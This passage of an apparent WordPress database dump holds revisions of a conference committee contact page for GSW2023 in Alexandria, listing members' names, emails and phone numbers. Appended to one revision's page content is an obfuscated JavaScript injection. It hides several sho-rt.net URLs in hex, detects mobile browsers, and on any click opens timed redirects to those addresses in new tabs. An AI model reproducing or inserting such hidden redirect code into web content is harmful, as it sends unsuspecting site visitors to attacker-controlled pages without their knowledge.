12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687873508355{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687873468324{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:45:14','2023-06-27 13:45:14','',4849,'https://gsw2023.com/?p=4940',0,'revision','',0),
(4941,4,'2023-06-27 13:45:48','2023-06-27 13:45:48','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687873508355{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687873468324{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column 